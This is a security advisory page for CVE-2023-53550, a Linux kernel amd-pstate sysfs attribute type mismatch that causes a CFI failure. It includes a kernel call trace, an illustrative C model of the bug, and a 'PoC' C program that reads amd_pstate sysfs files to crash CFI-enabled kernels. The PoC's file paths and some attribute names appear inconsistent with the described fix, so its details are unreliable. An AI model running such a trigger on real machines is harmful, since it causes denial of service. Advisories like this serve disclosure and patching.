Security Vulnerability Report
CVE-2023-53550 CVSS 5.5 MEDIUM

CVE-2023-53550

Published: 2025-10-04 16:15:50
Last Modified: 2026-04-06 13:33:05
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

cpufreq: amd-pstate: fix global sysfs attribute type

In commit 3666062b87ec ("cpufreq: amd-pstate: move to use bus_get_dev_root()") the "amd_pstate" attributes were moved from a dedicated kobject to the cpu root kobject.

While the dedicated kobject expects to contain kobj_attributes the root kobject needs device_attributes.

As the changed arguments are not used by the callbacks it works most of the time. However CFI will detect this issue:

```
[ 4947.849350] CFI failure at dev_attr_show+0x24/0x60 (target: show_status+0x0/0x70; expected type: 0x8651b1de)
...
[ 4947.849409] Call Trace:
[ 4947.849410] <TASK>
[ 4947.849411] ? __warn+0xcf/0x1c0
[ 4947.849414] ? dev_attr_show+0x24/0x60
[ 4947.849415] ? report_cfi_failure+0x4e/0x60
[ 4947.849417] ? handle_cfi_failure+0x14c/0x1d0
[ 4947.849419] ? __cfi_show_status+0x10/0x10
[ 4947.849420] ? handle_bug+0x4f/0x90
[ 4947.849421] ? exc_invalid_op+0x1a/0x60
[ 4947.849422] ? asm_exc_invalid_op+0x1a/0x20
[ 4947.849424] ? __cfi_show_status+0x10/0x10
[ 4947.849425] ? dev_attr_show+0x24/0x60
[ 4947.849426] sysfs_kf_seq_show+0xa6/0x110
[ 4947.849433] seq_read_iter+0x16c/0x4b0
[ 4947.849436] vfs_read+0x272/0x2d0
[ 4947.849438] ksys_read+0x72/0xe0
[ 4947.849439] do_syscall_64+0x76/0xb0
[ 4947.849440] ? do_user_addr_fault+0x252/0x650
[ 4947.849442] ? exc_page_fault+0x7a/0x1b0
[ 4947.849443] entry_SYSCALL_64_after_hwframe+0x72/0xdc
```
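A user-space model of the mismatch described above, added here as an illustration; it is not part of the CVE record or the kernel patch. The type tag stands in for kCFI's prototype hash, and `dev_attr_show_model`, `status_show_fixed`, `CFI_TRAP` and the struct layouts are assumptions made for the example.

```c
#include <stdio.h>
#include <sys/types.h>
/* Minimal stand-ins for the kernel types; only the prototypes matter here. */
struct kobject { const char *name; };
struct kobj_attribute { const char *name; };
struct device { struct kobject kobj; };
struct device_attribute { const char *name; };
typedef ssize_t (*kobj_show_t)(struct kobject *, struct kobj_attribute *, char *);
typedef ssize_t (*dev_show_t)(struct device *, struct device_attribute *, char *);

/* kCFI keeps a hash of each function's prototype; this tag models that hash. */
enum proto { PROTO_KOBJ_SHOW, PROTO_DEV_SHOW };
struct callback { enum proto tag; union { kobj_show_t kobj; dev_show_t dev; } fn; };

/* Before the fix: kobj_attribute prototype; the first two arguments are unused. */
static ssize_t show_status(struct kobject *k, struct kobj_attribute *a, char *buf)
{
    (void)k; (void)a;
    return sprintf(buf, "active\n");
}

/* After the fix (hypothetical name): the prototype dev_attr_show() expects. */
static ssize_t status_show_fixed(struct device *d, struct device_attribute *a, char *buf)
{
    (void)d; (void)a;
    return sprintf(buf, "active\n");
}
#define CFI_TRAP (-1) /* models the "CFI failure at dev_attr_show" report */

/* Model of the indirect call made by dev_attr_show(). */
ssize_t dev_attr_show_model(const struct callback *cb, int cfi, char *buf)
{
    struct device dev = { { "cpu" } };
    struct device_attribute attr = { "status" };
    if (cb->tag == PROTO_DEV_SHOW)
        return cb->fn.dev(&dev, &attr, buf);
    if (cfi)
        return CFI_TRAP; /* prototype hash differs from the expected type */
    /* No CFI: the same pointers are passed and the callee never reads them. */
    return cb->fn.kobj((struct kobject *)&dev, (struct kobj_attribute *)&attr, buf);
}

const struct callback before_fix = { PROTO_KOBJ_SHOW, { .kobj = show_status } };
const struct callback after_fix = { PROTO_DEV_SHOW, { .dev = status_show_fixed } };
int main(void)
{
    char b[32];
    printf("%zd %zd\n", dev_attr_show_model(&before_fix, 1, b), dev_attr_show_model(&after_fix, 1, b));
    return 0;
}
```

Without the check the pre-fix callback returns its 7 bytes as if nothing were wrong, which is why the bug only surfaces on CFI-enabled builds.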

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:* - VULNERABLE
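Linux Kernel: all versions that contain the affected commit 3666062b87ec
Linux Kernel stable versions (versions prior to the fix commit 5e720f8c8c9d959283c3908bbf32a91a01a86547; refer to that commit)
Linux Kernel stable versions (versions prior to the fix commit ddcfc33a20380508f7fea18e1c330abe17ed4fc0; refer to that commit)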

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// PoC for CVE-2023-53550: Trigger CFI failure via sysfs attribute read
// This PoC demonstrates how to trigger the type mismatch in amd-pstate sysfs attributes
// Requires: Linux kernel with CFI enabled, AMD CPU with amd-pstate driver
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

// The amd_pstate sysfs attributes that trigger the CFI failure
// These attributes were incorrectly registered as kobj_attributes
// on the cpu root kobject which expects device_attributes
static const char *amd_pstate_attrs[] = {
    "/sys/devices/system/cpu/cpufreq/amd_pstate/status",
    "/sys/devices/system/cpu/cpufreq/amd_pstate/highest_perf",
    "/sys/devices/system/cpu/cpufreq/amd_pstate/lowest_nonlinear_perf",
    "/sys/devices/system/cpu/cpufreq/amd_pstate/nominal_perf",
    "/sys/devices/system/cpu/cpufreq/amd_pstate/lowest_perf",
    "/sys/devices/system/cpu/cpufreq/amd_pstate/preferred_perf",
    "/sys/devices/system/cpu/cpufreq/amd_pstate/cache",
    "/sys/devices/system/cpu/cpufreq/amd_pstate/epp",
    "/sys/devices/system/cpu/cpufreq/amd_pstate/epp_values",
    NULL
};

int main(void)
{
    char buf[256];
    ssize_t ret;
    int fd, i;

    printf("CVE-2023-53550 PoC - amd-pstate sysfs CFI failure trigger\n");
    printf("Attempting to read amd_pstate sysfs attributes to trigger CFI failure...\n\n");

    for (i = 0; amd_pstate_attrs[i] != NULL; i++) {
        printf("Reading: %s\n", amd_pstate_attrs[i]);
        fd = open(amd_pstate_attrs[i], O_RDONLY);
        if (fd < 0) {
            printf(" [-] Cannot open attribute (may not exist on this system)\n");
            continue;
        }

        // Reading the attribute triggers dev_attr_show() which calls
        // the incorrectly-typed show callback, triggering CFI failure
        ret = read(fd, buf, sizeof(buf) - 1);
        close(fd);
        if (ret > 0) {
            buf[ret] = '\0';
            printf(" [+] Read %zd bytes: %s\n", ret, buf);
            printf(" [!] If CFI is enabled, this should have triggered a CFI failure\n");
        }
    }

    printf("\nDone. Check dmesg for CFI failure messages:\n");
    printf(" CFI failure at dev_attr_show+0x24/0x60 (target: show_status+0x0/0x70)\n");
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53550", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:50.260", "lastModified": "2026-04-06T13:33:04.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpufreq: amd-pstate: fix global sysfs attribute type\n\nIn commit 3666062b87ec (\"cpufreq: amd-pstate: move to use bus_get_dev_root()\")\nthe \"amd_pstate\" attributes where moved from a dedicated kobject to the\ncpu root kobject.\n\nWhile the dedicated kobject expects to contain kobj_attributes the root\nkobject needs device_attributes.\n\nAs the changed arguments are not used by the callbacks it works most of\nthe time.\nHowever CFI will detect this issue:\n\n[ 4947.849350] CFI failure at dev_attr_show+0x24/0x60 (target: show_status+0x0/0x70; expected type: 0x8651b1de)\n...\n[ 4947.849409] Call Trace:\n[ 4947.849410] <TASK>\n[ 4947.849411] ? __warn+0xcf/0x1c0\n[ 4947.849414] ? dev_attr_show+0x24/0x60\n[ 4947.849415] ? report_cfi_failure+0x4e/0x60\n[ 4947.849417] ? handle_cfi_failure+0x14c/0x1d0\n[ 4947.849419] ? __cfi_show_status+0x10/0x10\n[ 4947.849420] ? handle_bug+0x4f/0x90\n[ 4947.849421] ? exc_invalid_op+0x1a/0x60\n[ 4947.849422] ? asm_exc_invalid_op+0x1a/0x20\n[ 4947.849424] ? __cfi_show_status+0x10/0x10\n[ 4947.849425] ? dev_attr_show+0x24/0x60\n[ 4947.849426] sysfs_kf_seq_show+0xa6/0x110\n[ 4947.849433] seq_read_iter+0x16c/0x4b0\n[ 4947.849436] vfs_read+0x272/0x2d0\n[ 4947.849438] ksys_read+0x72/0xe0\n[ 4947.849439] do_syscall_64+0x76/0xb0\n[ 4947.849440] ? do_user_addr_fault+0x252/0x650\n[ 4947.849442] ? 
exc_page_fault+0x7a/0x1b0\n[ 4947.849443] entry_SYSCALL_64_after_hwframe+0x72/0xdc"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.11", "matchCriteriaId": "5973AAD4-BEF4-4A23-9697-7061E1749BFF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5e720f8c8c9d959283c3908bbf32a91a01a86547", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ddcfc33a20380508f7fea18e1c330abe17ed4fc0", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}